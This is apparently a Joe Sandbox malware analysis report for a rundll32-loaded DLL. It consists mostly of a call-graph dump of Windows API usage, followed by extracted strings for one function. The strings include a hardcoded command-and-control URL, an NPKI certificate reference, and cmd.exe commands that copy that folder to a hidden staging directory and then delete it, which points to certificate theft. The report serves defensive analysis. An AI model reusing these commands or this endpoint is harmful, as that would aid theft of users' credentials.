5560->5556 5560->5557 5560->5558 5560->5559 5560->5561 5560->5562 5560->5563 5560->5589 5603 10004c70 RegQueryValueExA 5561->5603 5606 100048c0 lstrcat 5562->5606 5597 10004c70 RegQueryValueExA 5563->5597 5574 1000addc 5564->5574 5578 1000adb1 5571->5578 5573->5574 5585 10004920 wvsprintfA 5574->5585 5575 1000ae22 5575->5480 5576 1000ad2b 5581 1000ad36 5576->5581 5576->5589 5582 1000ad75 5577->5582 5583 10004920 wvsprintfA 5578->5583 5579 1000abc9 5579->5589 5600 10004920 5579->5600 5586 10004920 wvsprintfA 5580->5586 5580->5589 5604 10004bc0 RegEnumKeyExA 5580->5604 5581->5555 5581->5557 5581->5558 5581->5559 5581->5562 5587 10004920 wvsprintfA 5582->5587 5583->5562 5585->5562 5586->5580 5587->5562 5588 1000ab49 strncat strncat 5590 1000ab2e 5588->5590 5589->5551 5590->5588 5590->5589 5591->5547 5607 10004c60 RegCloseKey 5592->5607 5594 1000ae3a 5608 10004c60 RegCloseKey 5594->5608 5596 1000ae46 5596->5552 5597->5589 5598->5590 5599->5579 5609 10004900 wvsprintfA 5600->5609 5602 10004934 5602->5589 5603->5589 5604->5580 5605->5576 5606->5575 5607->5594 5608->5596 5609->5602 5610->5485 5612 10004daa 5611->5612 5613 10004df1 GetModuleFileNameA strrchr 5612->5613 5614 10004dce 5612->5614 5616 10004f4a 5613->5616 5617 10004e1a 5613->5617 5615 10004e4d CreateFileA 5614->5615 5615->5616 5618 10004e73 8 API calls 5615->5618 5616->5425 5617->5615 5618->5616 5642 10008e50 malloc 5619->5642 5621 10008f4e 5622 10008fcb 5621->5622 5623 10008f8c toupper 5621->5623 5624 10008fa6 tolower 5621->5624 5622->5517 5623->5621 5624->5621 5626 10001000 2 API calls 5625->5626 5627 10007593 5626->5627 5644 10004940 InternetOpenA 5627->5644 5629 1000759c 5640 100075e1 5629->5640 5645 10004960 InternetOpenUrlA 5629->5645 5631 100075bb 5632 100075c2 5631->5632 5633 100075d5 5631->5633 5646 100049b0 InternetCloseHandle 5632->5646 5648 100049b0 InternetCloseHandle 5633->5648 5636 100075c8 5647 100049b0 InternetCloseHandle 5636->5647 5637 100075db 5649 100049b0 InternetCloseHandle 5637->5649 5640->5507 5641 100075ce 5641->5507 5643 10008e7d 5642->5643 5643->5621 5644->5629 5645->5631 5646->5636 5647->5641 5648->5637 5649->5640 5651 10001000 2 API calls 5650->5651 5652 1000b705 5651->5652 5653 10001000 2 API calls 5652->5653 5654 1000b73a 5653->5654 5656 10004920 wvsprintfA 5654->5656 5658 1000b81b Sleep 5654->5658 5659 1000b8b0 5654->5659 5661 1000b89c wsprintfA 5654->5661 5743 10006d70 5654->5743 5759 10007470 5654->5759 5656->5654 5658->5654 5662 1000b8cf Sleep 5659->5662 5781 10009640 5659->5781 5661->5659 5662->5654 5664 100056d7 select 5663->5664 5666 10005729 5664->5666 5679 100056d3 5664->5679 5665 1000571c Sleep 5665->5664 5666->5664 5667 10005947 5666->5667 5670 10005795 wsprintfA 5666->5670 5673 10005828 malloc htons 5666->5673 5678 10005810 5666->5678 5668 10004da0 11 API calls 5667->5668 5669 10005956 5668->5669 5671 10005959 closesocket closesocket 5669->5671 5670->5666 5672 1000596f 5671->5672 5674 1000587a htons htons htons htons 5673->5674 5673->5678 5676 100058cb htons 5674->5676 5675 10005873 htons 5675->5674 5676->5679 5677 100058ec inet_addr 5677->5679 5678->5673 5678->5674 5678->5675 5679->5664 5679->5665 5679->5671 5679->5677 5686 100094f4 5680->5686 5681 10006d70 6 API calls 5681->5686 5682 10004920 wvsprintfA 5682->5686 5683 10007470 7 API calls 5683->5686 5684 10009593 Sleep 5684->5686 5685 1000962d Sleep 5685->5686 5686->5681 5686->5682 5686->5683 5686->5684 5686->5685 5687 10009607 5686->5687 5687->5685 5688 10009614 wsprintfA 5687->5688 6055 10006710 5688->6055 5691 1000b9ba 5690->5691 5692 1000ba01 RegOpenKeyExA 5691->5692 5693 1000ba25 RegQueryInfoKeyA 5692->5693 5694 1000baf8 RegCloseKey Sleep 5692->5694 5693->5694 5695 1000ba5b 5693->5695 5694->5692 5695->5694 5697 10010f36 5696->5697 5698 10008d04 WSAStartup 5697->5698 6126 100048e0 CreateMutexA 5698->6126 5700 10008d27 GetLastError 5701 10008d9d CloseHandle 5700->5701 5703 10008d38 5700->5703 5704 10008d64 CreateThread WaitForSingleObject CloseHandle Sleep 5703->5704 5705 10008d5b Sleep 5703->5705 6127 10007800 wsprintfA 5703->6127 5704->5703 5705->5703 5707 1000924a 5706->5707 5708 10001000 2 API calls 5707->5708 5709 10009258 5708->5709 5710 10001000 2 API calls 5709->5710 5711 10009264 5710->5711 5712 100069a0 lstrcmpiA CloseHandle CreateToolhelp32Snapshot Process32First Process32Next 5711->5712 5713 10009283 Sleep 5711->5713 5714 10009290 GetSystemDirectoryA GetSystemDirectoryA 5711->5714 5712->5711 5713->5711 5715 10001000 2 API calls 5714->5715 5716 100092eb 5715->5716 5717 10001000 2 API calls 5716->5717 5722 10009323 5717->5722 5718 10006d70 6 API calls 5718->5722 5719 10004920 wvsprintfA 5719->5722 5720 10007470 7 API calls 5720->5722 5721 10004da0 11 API calls 5723 10009416 Sleep 5721->5723 5722->5718 5722->5719 5722->5720 5722->5721 5727 10009455 5722->5727 5723->5722 5724 100094c4 Sleep 5724->5722 5725 10009466 wsprintfA 5726 100061f0 2 API calls 5725->5726 5726->5727 5727->5724 5727->5725 5728 10005130 CreateFileA WriteFile CloseHandle 5727->5728 5728->5727 6162 100048e0 CreateMutexA 5729->6162 5731 10008df5 GetLastError 5732 10008e06 5731->5732 5733 10008e3d CloseHandle 5731->5733 5734 10008e12 CreateThread WaitForSingleObject CloseHandle Sleep 5732->5734 5734->5734 6163 10008a70 5734->6163 5736 1000b5e9 5735->5736 5738 1000b0a0 114 API calls 5736->5738 5739 1000b681 Sleep 5736->5739 6329 10004b30 GetDriveTypeA 5736->6329 5738->5736 5739->5736 6330 10009000 5740->6330 5744 10004920 wvsprintfA 5743->5744 5745 10006da1 5744->5745 5889 10004a10 PathFileExistsA 5745->5889 5747 10006dab 5748 10006db2 5747->5748 5890 10004b40 CreateFileA 5747->5890 5748->5654 5750 10006ddf 5751 10006df4 5750->5751 5752 10006de9 5750->5752 5891 10004b70 ReadFile 5751->5891 5752->5654 5754 10006e11 5892 10004a50 CloseHandle 5754->5892 5756 10006e17 5893 10004a20 StrStrIA 5756->5893 5758 10006e22 5758->5654 5760 10001000 2 API calls 5759->5760 5761 1000748d 5760->5761 5894 10004940 InternetOpenA 5761->5894 5763 10007496 5764 100074a3 5763->5764 5895 10004960 InternetOpenUrlA 5763->5895 5764->5654 5766 100074c5 5767 100074ce 5766->5767 5775 100074e9 5766->5775 5896 100049b0 InternetCloseHandle 5767->5896 5769 10007553 5900 100049b0 InternetCloseHandle 5769->5900 5771 100074d4 5897 100049b0 InternetCloseHandle 5771->5897 5773 10007561 5901 100049b0 InternetCloseHandle 5773->5901 5775->5769 5778 10007549 5775->5778 5898 10004990 InternetReadFile 5775->5898 5777 100074da 5777->5654 5899 10004a50 CloseHandle 5778->5899 5779 10007567 5779->5654 5785 10009669 5781->5785 5782 10009efe 5986 1000a370 5782->5986 5784 10009f12 5784->5659 5785->5782 5902 10009fd0 5785->5902 5792 1000a200 3 API calls 5793 10009792 5792->5793 5793->5782 5794 10009f30 5 API calls 5793->5794 5795 100097a8 5794->5795 5796 10009f30 5 API calls 5795->5796 5797 100097be 5796->5797 5922 1000a070 5797->5922 5800 1000a200 3 API calls 5801 100097e5 5800->5801 5802 10009866 5801->5802 5803 10009f30 5 API calls 5801->5803 5804 10009f30 5 API calls 5802->5804 5805 1000980a 5803->5805 5811 10009882 5804->5811 5806 1000a070 4 API calls 5805->5806 5807 10009820 5806->5807 5808 1000a200 3 API calls 5807->5808 5809 10009831 5808->5809 5810 10009f30 5 API calls 5809->5810 5813 1000983f 5810->5813 5812 1000a200 3 API calls 5811->5812 5820 100098bd 5812->5820 5814 1000a070 4 API calls 5813->5814 5815 10009855 5814->5815 5817 1000a200 3 API calls 5815->5817 5816 10009915 5818 1000a200 3 API calls 5816->5818 5817->5802 5821 1000991e 5818->5821 5819 1000a200 3 API calls 5819->5782 5820->5816 5846 100098c1 5820->5846 5931 1000bed0 5820->5931 5831 1000996c 5821->5831 5936 1000a410 5821->5936 5827 1000a200 3 API calls 5828 1000995d 5827->5828 5829 1000a200 3 API calls 5828->5829 5829->5831 5830 100099b7 5834 100099d5 5830->5834 5979 100117f5 5830->5979 5831->5830 5831->5846 5974 1000a250 5831->5974 5835 10009a08 5834->5835 5982 1000a290 5834->5982 5837 1000a200 3 API calls 5835->5837 5838 10009a20 5837->5838 5840 10009f30 5 API calls 5838->5840 5841 10009d1a 5838->5841 5848 10009aa4 5838->5848 5839 10009eeb 5843 1000a200 3 API calls 5839->5843 5853 10009a69 5840->5853 5841->5839 5842 10009da5 5841->5842 5845 10009f30 5 API calls 5841->5845 5842->5839 5844 10009f30 5 API calls 5842->5844 5843->5846 5849 10009dd1 5844->5849 5855 10009d6a 5845->5855 5846->5819 5847 10009ae0 5852 100117f5 _CxxThrowException 5847->5852 5860 10009afe 5847->5860 5848->5841 5848->5847 5850 1000a250 5 API calls 5848->5850 5851 10009f30 5 API calls 5849->5851 5850->5847 5857 10009de3 5851->5857 5852->5860 5854 1000a200 3 API calls 5853->5854 5854->5848 5856 1000a200 3 API calls 5855->5856 5856->5842 5858 10009f30 5 API calls 5857->5858 5861 10009e4c 5858->5861 5859 10009b98 5865 100117f5 _CxxThrowException 5859->5865 5867 10009bb6 5859->5867 5860->5859 5862 1000a250 5 API calls 5860->5862 5863 1000a200 3 API calls 5861->5863 5862->5859 5864 10009e84 5863->5864 5866 10009f30 5 API calls 5864->5866 5865->5867 5869 10009e92 5866->5869 5868 1000a200 3 API calls 5867->5868 5871 10009bf1 5868->5871 5872 1000a200 3 API calls 5869->5872 5870 10009c17 5876 100117f5 _CxxThrowException 5870->5876 5879 10009c35 5870->5879 5871->5870 5873 1000a250 5 API calls 5871->5873 5874 10009ed9 5872->5874 5873->5870 5875 1000a200 3 API calls 5874->5875 5877 10009ee2 5875->5877 5876->5879 5878 1000a200 3 API calls 5877->5878 5878->5839 5880 1000a200 3 API calls 5879->5880 5882 10009c70 5880->5882 5881 10009c96 5884 100117f5 _CxxThrowException 5881->5884 5885 10009cb4 5881->5885 5882->5881 5883 1000a250 5 API calls 5882->5883 5883->5881 5884->5885 5886 1000a200 3 API calls 5885->5886 5887 10009cfd 5886->5887 5888 1000a200 3 API calls 5887->5888 5888->5841 5889->5747 5890->5750 5891->5754 5892->5756 5893->5758 5894->5763 5895->5766 5896->5771 5897->5777 5898->5775 5899->5769 5900->5773 5901->5779 5905 10009ff1 5902->5905 5903 1000a034 5904 100096e8 5903->5904 5906 100117f5 _CxxThrowException 5903->5906 5908 1000a200 5904->5908 5905->5903 5907 100117f5 _CxxThrowException 5905->5907 5906->5904 5907->5903 5909 10009725 5908->5909 5910 1000a20a InterlockedDecrement 5908->5910 5909->5782 5914 10009f30 5909->5914 5910->5909 5911 1000a218 5910->5911 5911->5909 5912 1000a230 6CEE2C70 5911->5912 5913 1000a239 6CEE2C70 5911->5913 5912->5913 5913->5909 5915 10009f51 5914->5915 5918 10009f93 5915->5918 5989 100116b0 5915->5989 5917 10009758 5917->5792 5918->5917 5920 100117f5 _CxxThrowException 5918->5920 5920->5917 5921 100117f5 _CxxThrowException 5921->5918 5923 1000a099 5922->5923 5929 100117f5 _CxxThrowException 5923->5929 5930 1000a119 5923->5930 5924 100097d4 5924->5800 5925 1000a187 InterlockedDecrement 5925->5924 5926 1000a195 5925->5926 5926->5924 5927 1000a1b6 6CEE2C70 5926->5927 5928 1000a1ad 6CEE2C70 5926->5928 5927->5924 5928->5927 5929->5930 5930->5924 5930->5925 5932 1000bfc9 5931->5932 5933 1000beff 5931->5933 5932->5820 5934 1000bf8b 6CEE2C70 5933->5934 5935 1000bfac 5934->5935 5935->5820 5937 1000a448 5936->5937 5955 1000a5f4 5936->5955 5943 1000a492 5937->5943 5944 1000a250 5 API calls 5937->5944 5937->5955 5938 1000994b 5971 1000a1e0 5938->5971 5939 1000a602 InterlockedIncrement 5939->5938 5940 1000a614 InterlockedDecrement 5939->5940 5940->5938 5941 1000a624 5940->5941 5941->5938 6039 10006050 5941->6039 5945 100117f5 _CxxThrowException 5943->5945 5946 1000a4ab 5943->5946 5944->5943 5945->5946 5947 1000a4e7 5946->5947 6000 10006000 InterlockedDecrement 5946->6000 5949 1000a54b 5947->5949 5950 1000a4ff 5947->5950 5956 1000a537 5947->5956 5951 1000a596 5949->5951 5952 1000a554 5949->5952 5953 10006000 3 API calls 5950->5953 5957 1000a510 5950->5957 6027 1000a770 5951->6027 6010 1000a7d0 5952->6010 5953->5957 5955->5938 5955->5939 5956->5955 5960 100117f5 _CxxThrowException 5956->5960 5957->5956 6006 1000a730 5957->6006 5960->5955 5963 1000a578 5966 1000a200 3 API calls 5963->5966 5964 1000a56e InterlockedIncrement 5964->5963 5967 1000a581 5966->5967 5967->5956 5969 10006000 3 API calls 5967->5969 5969->5956 5970 100117f5 _CxxThrowException 5970->5956 5972 10009954 5971->5972 5973 1000a1e6 InterlockedIncrement 5971->5973 5972->5827 5973->5972 5975 100116b0 5 API calls 5974->5975 5976 1000a26c 5975->5976 5977 1000a280 5976->5977 5978 100117f5 _CxxThrowException 5976->5978 5977->5830 5978->5977 6049 10011803 5979->6049 5983 1000a2b3 5982->5983 5984 100117f5 _CxxThrowException 5983->5984 5985 1000a305 5983->5985 5984->5985 5985->5835 5987 1000a39f 6CEE2C70 5986->5987 5987->5784 5990 10009f7f 5989->5990 5991 100116bf lstrlen 5989->5991 5990->5918 5990->5921 5998 10010f90 5991->5998 5993 100116d8 MultiByteToWideChar 5993->5990 5994 100116f3 GetLastError 5993->5994 5995 100116ff GetLastError 5994->5995 5996 1001170d 5994->5996 5995->5996 5997 100117f5 _CxxThrowException 5996->5997 5997->5990 5999 10010f9c 5998->5999 5999->5993 5999->5999 6001 10006041 6000->6001 6003 10006012 6000->6003 6001->5947 6002 1000603c 6002->5947 6003->6002 6004 10006033 6CEE2C70 6003->6004 6005 1000602a 6CEE2C70 6003->6005 6004->6002 6005->6004 6007 1000a74d 6006->6007 6008 1000a761 6007->6008 6009 100117f5 _CxxThrowException 6007->6009 6008->5956 6009->6008 6019 1000a80d 6010->6019 6011 1000a961 InterlockedIncrement 6012 1000a563 6011->6012 6013 1000a973 InterlockedDecrement 6011->6013 6012->5963 6012->5964 6013->6012 6015 1000a981 6013->6015 6014 1000a947 6014->6011 6014->6012 6015->6012 6016 1000a9a2 6CEE2C70 6015->6016 6017 1000a999 6CEE2C70 6015->6017 6016->6012 6017->6016 6018 100117f5 _CxxThrowException 6018->6019 6019->6014 6019->6018 6020 1000a290 _CxxThrowException 6019->6020 6021 1000a8de InterlockedDecrement 6019->6021 6022 1000a912 InterlockedDecrement 6019->6022 6025 1000a9c0 6CEE2C70 6019->6025 6045 1000a9c0 6019->6045 6020->6019 6021->6019 6022->6019 6026 1000a92d 6CEE2C70 6025->6026 6026->6019 6028 1000a77c 6027->6028 6029 1000a5b2 6028->6029 6030 100117f5 _CxxThrowException 6028->6030 6031 1000a650 6029->6031 6030->6029 6032 1000a670 InterlockedDecrement 6031->6032 6033 1000a6a8 6031->6033 6032->6033 6034 1000a67e 6032->6034 6037 1000a5c0 6033->6037 6038 100117f5 _CxxThrowException 6033->6038 6034->6033 6035 1000a696 6CEE2C70 6034->6035 6036 1000a69f 6CEE2C70 6034->6036 6035->6036 6036->6033 6037->5956 6037->5970 6038->6037 6040 10006059 6039->6040 6041 10006070 6040->6041 6042 10006067 6CEE2C70 6040->6042 6043 10006080 6041->6043 6044 10006077 6CEE2C70 6041->6044 6042->6041 6043->5938 6044->6043 6046 1000a9c9 6045->6046 6047 1000a8f9 6CEE2C70 6046->6047 6048 1000a9d7 6CEE2C70 6046->6048 6047->6019 6048->6047 6053 10011827 6049->6053 6052 10011800 6052->5834 6054 10011819 _CxxThrowException 6053->6054 6054->6052 6056 1000671a 6055->6056 6068 10006090 6056->6068 6058 10006722 wsprintfA 6071 100061f0 6058->6071 6062 100067f7 6078 10005a10 6062->6078 6065 10006813 OpenProcess 6066 1000684d 6065->6066 6067 10006829 CreateThread 6065->6067 6066->5685 6067->6066 6110 100065e0 6067->6110 6069 100060cf 6068->6069 6070 10006102 10 API calls 6069->6070 6070->6058 6072 10010f90 6071->6072 6073 100061fa strchr 6072->6073 6074 10006323 wsprintfA wsprintfA CreateDirectoryA 6073->6074 6075 10006259 6073->6075 6077 10005130 CreateFileA WriteFile CloseHandle 6074->6077 6076 10006262 strchr 6075->6076 6076->6074 6076->6076 6077->6062 6080 10005a2f 6078->6080 6079 10005acb 6081 100117f5 _CxxThrowException 6079->6081 6083 10005aec 6079->6083 6080->6079 6082 100117f5 _CxxThrowException 6080->6082 6081->6083 6082->6079 6084 10005b29 wcscat 6083->6084 6085 10006000 3 API calls 6083->6085 6088 10005b80 6084->6088 6085->6084 6087 10005bc1 6089 100117f5 _CxxThrowException 6087->6089 6090 10005be2 6087->6090 6088->6087 6091 100117f5 _CxxThrowException 6088->6091 6089->6090 6092 10005c42 6090->6092 6093 100116b0 5 API calls 6090->6093 6091->6087 6095 100117f5 _CxxThrowException 6092->6095 6097 10005c60 6092->6097 6094 10005c29 6093->6094 6094->6092 6096 100117f5 _CxxThrowException 6094->6096 6095->6097 6096->6092 6098 10005c95 6097->6098 6099 10006000 3 API calls 6097->6099 6100 10006000 3 API calls 6098->6100 6108 10005cab 6098->6108 6099->6098 6100->6108 6101 10005f97 6101->6065 6101->6066 6102 100117f5 _CxxThrowException 6102->6108 6103 10005e34 InterlockedDecrement 6104 10005e4b _strcmpi 6103->6104 6103->6108 6104->6108 6105 10006050 2 API calls 6105->6104 6106 10005f55 InterlockedDecrement 6106->6108 6107 10011725 wcslen WideCharToMultiByte GetLastError GetLastError _CxxThrowException 6107->6108 6108->6101 6108->6102 6108->6103 6108->6104 6108->6105 6108->6106 6108->6107 6109 10006050 2 API calls 6108->6109 6109->6108 6111 1000660e 6110->6111 6112 100066e1 6CEE2C70 CloseHandle 6111->6112 6113 1000662f VirtualQueryEx 6111->6113 6114 10006684 ReadProcessMemory 6111->6114 6115 1000666d 6CEE2C70 6111->6115 6117 10006330 6111->6117 6113->6111 6113->6112 6114->6111 6115->6111 6119 1000633a 6117->6119 6118 10006583 6118->6111 6119->6118 6120 1000639a wsprintfA 6119->6120 6121 100061f0 2 API calls 6120->6121 6122 100063ec wsprintfA wsprintfA CreateDirectoryA 6121->6122 6125 10005130 CreateFileA WriteFile CloseHandle 6122->6125 6124 10006477 14 API calls 6124->6119 6125->6124 6126->5700 6128 10007873 6127->6128 6159 10004940 InternetOpenA 6128->6159 6130 1000789b 6131 100078a2 6130->6131 6160 10004960 InternetOpenUrlA 6130->6160 6131->5703 6133 100078d4 6133->5703 6135 10007969 MultiByteToWideChar 6136 100078ca 6135->6136 6136->6133 6136->6135 6137 10007988 MultiByteToWideChar WideCharToMultiByte 6136->6137 6138 100079be WideCharToMultiByte 6CEE2C70 6136->6138 6139 10007a07 6136->6139 6161 10004990 InternetReadFile 6136->6161 6137->6136 6140 100079f6 6CEE2C70 6138->6140 6141 10007a81 6139->6141 6142 10007af3 wsprintfA 6139->6142 6140->6136 6144 10007a90 6141->6144 6146 10007a97 6CEE2C70 6141->6146 6143 10007b14 6CEE2C70 strrchr 6142->6143 6148 10007bd2 6143->6148 6149 10007b56 6143->6149 6147 10007abc 6144->6147 6150 10007ad5 6CEE2C70 6144->6150 6146->6144 6147->5703 6151 10007be4 6148->6151 6153 10007beb 6CEE2C70 6148->6153 6152 10007b6b 6149->6152 6155 10007b72 6CEE2C70 6149->6155 6150->5703 6154 10007c10 6151->6154 6157 10007c28 6CEE2C70 6151->6157 6156 10007b97 6152->6156 6158 10007bb2 6CEE2C70 6152->6158 6153->6151 6154->5703 6155->6152 6156->5703 6157->6154 6158->6156 6159->6130 6160->6136 6161->6136 6162->5731 6184 100075f0 6163->6184 6165 10008aa1 6199 10006b90 setsockopt 6165->6199 6169 10008ab8 6170 10008acc send 6169->6170 6171 10008aea closesocket 6170->6171 6182 10008aff 6170->6182 6172 10008cd4 6173 10008b09 select 6174 10008cc7 InterlockedExchange 6173->6174 6173->6182 6174->6172 6175 10008c3e InterlockedExchange 6175->6173 6176 10008bfe closesocket 6176->6173 6177 10008c81 strstr 6179 10008c98 CreateThread 6177->6179 6177->6182 6179->6173 6289 100084a0 6179->6289 6181 10007110 6 API calls 6181->6182 6182->6172 6182->6173 6182->6174 6182->6175 6182->6176 6182->6177 6182->6181 6183 100049f0 ExitWindowsEx 6182->6183 6219 100071c0 6182->6219 6229 10007250 LoadLibraryA LoadLibraryA GetProcAddress GetProcAddress 6182->6229 6183->6182 6185 10007776 WSAStartup htons 6184->6185 6186 10007688 strstr 6184->6186 6231 10006860 inet_addr inet_addr 6185->6231 6187 100076aa 6186->6187 6188 100076fd 6186->6188 6235 100073c0 6187->6235 6193 10007725 strstr 6188->6193 6192 100076b7 strstr 6192->6188 6196 100076c8 strcspn strstr 6192->6196 6193->6185 6197 10007738 strcspn strncpy strcspn atoi 6193->6197 6194 100077d5 closesocket 6194->6165 6195 100077ea 6195->6165 6196->6193 6198 100076e3 strcspn strncpy 6196->6198 6197->6185 6198->6193 6200 10006bb1 6199->6200 6201 10006f20 RegOpenKeyExA 6200->6201 6202 10006f96 6201->6202 6203 10006f59 6201->6203 6254 100068d0 6202->6254 6260 10004c70 RegQueryValueExA 6203->6260 6205 10006f8c 6261 10004c60 RegCloseKey 6205->6261 6209 10006bf0 2 API calls 6210 10006ff9 GlobalMemoryStatusEx 6209->6210 6211 10007021 6210->6211 6212 10004920 wvsprintfA 6211->6212 6213 10007037 GetSystemDefaultUILanguage 6212->6213 6262 10006e40 6213->6262 6215 100070aa 6216 100070b1 6215->6216 6217 10004920 wvsprintfA 6215->6217 6216->6169 6218 100070fb 6217->6218 6218->6169 6220 10004920 wvsprintfA 6219->6220 6221 100071db 6220->6221 6286 10004b40 CreateFileA 6221->6286 6223 100071ff 6224 10007209 6223->6224 6287 10004a60 WriteFile 6223->6287 6224->6182 6226 10007236 6288 10004a50 CloseHandle 6226->6288 6228 1000723c 6228->6182 6230 100072ad 6229->6230 6230->6182 6232 10006876 6231->6232 6234 1000687c socket connect 6231->6234 6248 10004890 gethostbyname 6232->6248 6234->6194 6234->6195 6236 100073ca 6235->6236 6249 10004940 InternetOpenA 6236->6249 6238 100073f3 6239 10007461 6238->6239 6250 10004960 InternetOpenUrlA 6238->6250 6239->6192 6241 10007416 6247 10007447 6241->6247 6251 10004990 InternetReadFile 6241->6251 6244 10007441 6252 100049b0 InternetCloseHandle 6244->6252 6245 10007450 6245->6192 6253 100049b0 InternetCloseHandle 6247->6253 6248->6234 6249->6238 6250->6241 6251->6244 6252->6247 6253->6245 6255 10006994 6254->6255 6256 100068e7 6254->6256 6255->6209 6256->6255 6257 100068fb GlobalAlloc 6256->6257 6258 10006943 6257->6258 6259 1000698b GlobalFree 6257->6259 6258->6258 6258->6259 6259->6255 6260->6205 6261->6202 6263 10004920 wvsprintfA 6262->6263 6264 10006e71 6263->6264 6280 10004a10 PathFileExistsA 6264->6280 6266 10006e82 6266->6215 6267 10006e7b 6267->6266 6281 10004b40 CreateFileA 6267->6281 6269 10006eaf 6270 10006eb9 6269->6270 6282 10004b70 ReadFile 6269->6282 6270->6215 6272 10006ee1 6283 10004a50 CloseHandle 6272->6283 6274 10006ee7 6284 10004a20 StrStrIA 6274->6284 6276 10006ef2 6277 10006ef9 6276->6277 6285 10004a20 StrStrIA 6276->6285 6277->6215 6279 10006f0d 6279->6215 6280->6267 6281->6269 6282->6272 6283->6274 6284->6276 6285->6279 6286->6223 6287->6226 6288->6228 6290 10004f60 5 API calls 6289->6290 6291 100084b4 6290->6291 6321 10008440 6291->6321 6293 100084c1 6294 100084bc 6294->6293 6295 10007470 7 API calls 6294->6295 6297 100084f6 6295->6297 6296 10006bf0 2 API calls 6298 10008559 GetTickCount srand 6296->6298 6297->6296 6320 10008a56 6297->6320 6300 100085ea rand 6298->6300 6301 100085f3 6300->6301 6301->6300 6302 10008606 wsprintfA CreateDirectoryA rand 6301->6302 6303 10008664 rand 6302->6303 6304 1000865f 6302->6304 6305 10008673 6303->6305 6306 10008678 rand 6303->6306 6304->6303 6305->6306 6307 10008687 6306->6307 6308 1000868c rand 6306->6308 6307->6308 6309 100086a0 rand 6308->6309 6310 1000869b 6308->6310 6311 100086b4 wsprintfA wsprintfA 6309->6311 6312 100086af 6309->6312 6310->6309 6313 100086f5 6311->6313 6312->6311 6328 10007d30 CreateFileA WriteFile CloseHandle 6313->6328 6315 10008708 Sleep 6317 10008440 20 API calls 6315->6317 6318 10008728 6317->6318 6319 10008730 50 API calls 6318->6319 6318->6320 6319->6320 6322 10004f60 5 API calls 6321->6322 6323 1000844e CreateMutexA GetLastError 6322->6323 6324 10008470 6323->6324 6325 1000848c ReleaseMutex CloseHandle 6324->6325 6326 10004da0 11 API calls 6324->6326 6325->6294 6327 10008484 6326->6327 6327->6325 6328->6315 6329->5736 6341 10004b10 GetShortPathNameA 6330->6341 6332 10009039 6333 10001000 2 API calls 6332->6333 6334 10009060 6333->6334 6342 10004c20 RegCreateKeyExA 6334->6342 6336 1000906e wsprintfA 6343 10004cc0 RegSetValueExA 6336->6343 6338 100090c2 6344 10004c60 RegCloseKey 6338->6344 6340 100090cf 6341->6332 6342->6336 6343->6338 6344->6340 7527 10011330 7528 1001130a 7527->7528 7528->7527 7529 10011a56 9 API calls 7528->7529 7529->7528 7603 10001770 7604 10001780 7603->7604 7605 10001000 2 API calls 7604->7605 7606 1000178a GetProcAddress 7605->7606 7639 10007f84 7640 10007f8e _CxxThrowException 7639->7640 7641 10007fb9 7640->7641 7642 10007fbd _CxxThrowException 7641->7642 7643 10007fd8 7641->7643 7644 1000802e RegCloseKey 7643->7644 7645 10007fee lstrlen 7643->7645 7645->7644 6345 10021789 6347 10021790 6345->6347 6348 100217b6 VirtualAlloc 6347->6348 6349 100217a5 6347->6349 6350 10021a01 6348->6350 6351 100217fb 6348->6351 6349->6348 6349->6350 6351->6350 6353 10021806 6351->6353 6354 10021815 6353->6354 6355 10021872 VirtualFree 6354->6355 6358 1002189a 6355->6358 6356 10021a01 6356->6350 6357 100219e2 VirtualProtect 6357->6356 6357->6357 6358->6356 6358->6357 7676 1000fba0 7677 1000fbab 7676->7677 7678 1000fbad 7676->7678 7681 1000fbf0 7678->7681 7680 1000fbbc 7682 1000fc21 7681->7682 7683 1000fc05 7681->7683 7684 1000fc7c 7682->7684 7685 1000fcc4 WriteFile 7682->7685 7683->7682 7686 1000fc11 6CEE2C70 7683->7686 7684->7680 7685->7680 7686->7682 7714 1000a7b0 7716 1000a7b7 7714->7716 7715 1000a7c1 7716->7715 7717 100117f5 _CxxThrowException 7716->7717 7717->7715 7811 10007ffb 7812 1000800d 7811->7812 7813 1000802e RegCloseKey 7812->7813

                                                Executed Functions

                                                Function 1000B0A0 Relevance: 75.6, APIs: 31, Strings: 12, Instructions: 387stringfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: lstrcatrand$FileFindlstrcpy$CountFirstNextTick_strcmpisrand
                                                • String ID: %s\%s$*.*$.$/u.php$09121307.txt$107.163.241.232:12354/show.php$NPKI$P$c:\%c%c%c%c.%c%c%c$c:\%s$cmd.exe /c md c:\%s && xcopy /Y "%s" "c:\%s" /S /E /C /H && exit$cmd.exe /c rd /q /s "c:\%s"
                                                • API String ID: 3781771675-2805527149
                                                • Opcode ID: bbee613478e399059a034d314f1c1b5c2bab36900512fa1b90fe0e01db607cb7
                                                • Instruction ID: eb23a03111fe4c4eb7601a1bdb2af3d3cdc9092a3aaab1ed9f55861fbd2d4e08
                                                • Opcode Fuzzy Hash: bbee613478e399059a034d314f1c1b5c2bab36900512fa1b90fe0e01db607cb7
                                                • Instruction Fuzzy Hash: 5FD1A6B1508386AFE725CB64CD91BEB77DAEBC8344F004D2DE68A97241DB74D6088B53
                                                Function 100055E0 Relevance: 56.3, APIs: 23, Strings: 9, Instructions: 263networksleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
